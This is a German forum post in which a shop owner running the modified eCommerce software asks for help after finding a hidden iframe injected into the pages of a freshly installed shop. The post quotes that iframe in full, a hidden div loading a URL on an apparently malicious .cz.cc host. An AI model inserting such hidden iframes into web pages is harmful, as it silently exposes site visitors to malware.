Hallihallo....
Habe ein etwas seltsames Problem. Bin jetzt von selfcommerce auf modified eCommerce Shopsoftwareod umgestiegen. Deswegen hab ich mir natürlich eure neue Version geholt. Erstmal dickes Lob. Aber nun zu meinem Problem: Habe den Shop letztens komplett neu aufgesetzt auf jungfräulichem Webspace inkl. neuer unbenutzter Datenbank. Dann erste Shopeinstellungen vorgenommen und als einziges im Quellcode die SSL-Unterstützung zugeschaltet. Shop befindet sich derzeit im Wartungsmodus>>>Link entfernt<<<
Um CSS zuordenen zu können hab ich mir meine Website im Browser im Quelltext angesehen. Dabei fiel mir folgende Zeile auf:
<div style="display:none"><iframe src="http://rthlsdinks.cz.cc/xp/index.php?tp=bdd9e836c0f58a18"></iframe></div>
Diese Zeile ist eigentlich sogut wie auf jeder Seite zu finden und das auch noch mehrfach pro Seite. Wenn man dem Link folgen möchte warnt Firefox vor einen potenziell gefährlichen Website also Spam, Bot, Virus o.ä. Ich hab den Link noch nie gesehen oder irgendwo eingegeben, aber er scheint ja irgendwo in der xtc-Engine erzeugt zu werden und dann in die Ausgabe eingebaut zu werden. Da ich das nicht getan habe muß es jemand von außerhalb getan haben oder es war schon eingebaut was ich allerdings nicht glaube da ich eurem Code schon vertraue. So und jetzt meine Fragen: Wo könnte das herkommen, wie kann das in meine Engine gelangen und vor allem wo und in welchem Bereich von xtc wird er generiert?
Vielleicht hat jemand eine plausible Idee dazu denn, ich mag eigentlich nicht von einem Sicherheitsloch in xtc sprechen wollen, aber irgendwie scheint meine Seite gehijackt worden zu sein und ich will eigentlich nicht nochmal alles komplett neu aufsetzten zu müssen. Danke schon mal für eine weiterführende Info diesbezüglich...
[
EDIT Tomcraft 14.04.2011: Link entfernt zum Schutz der anderen Forenbenutzer!]
Linkback: https://www.modified-shop.org/forum/index.php?topic=12331.0 
